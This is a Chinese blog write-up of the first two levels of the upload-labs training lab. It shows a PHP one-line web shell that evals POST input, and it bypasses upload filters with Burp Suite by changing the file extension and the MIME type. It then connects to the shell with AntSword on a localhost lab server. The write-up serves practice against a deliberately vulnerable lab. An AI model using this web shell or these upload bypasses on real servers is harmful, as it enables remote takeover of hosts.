upload-labs-第一关和第二关

目录

第一关

思路:

1、上传一个php文件

2、查看源码

3、查看文件上传地址

4、BP抓包,修改文件后缀名

5、使用蚁剑连接

第二关

1、这一关也可以跟第一关一样的方法进行绕过

2、上传一个一句话木马文件

第一关

原理:

思路:
1、上传一个php文件

<?php
phpinfo();
@eval($_POST['cmd']); #一句话木马
?>

结果上传失败,并要求我们上传的文件是图片格式的

2、查看源码

发现在前端的代码作了限制,使用checkFile()来检查文件格式,我们可以使用BP抓包,修改文件的后缀名,进行上传

3、查看文件上传地址

先正常上传一个图片

右键查看图像信息,发现上传文件的保存路径

4、BP抓包,修改文件后缀名

将一句话木马文件后缀改成jpg,然后放包上传

上传成功

访问上传的地址

http://127.0.0.1:90/upload-labs-master/upload/flag.php

代码正常执行

5、使用蚁剑连接

连接成功,成功进入主机


第二关

原理:

思路:

1、这一关也可以跟第一关一样的方法进行绕过

下面演示另外一种方法,修改MIME类型

2、上传一个一句话木马文件

上传成功

3、访问上传地址

http://127.0.0.1:90/upload-labs-master/upload/flag.php

php代码正常执行,说明一句话木马也可以执行,用蚁剑连接可以参考上面


这篇文章就先写到这里了,哪里不足欢迎批评指正!

  • 7
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值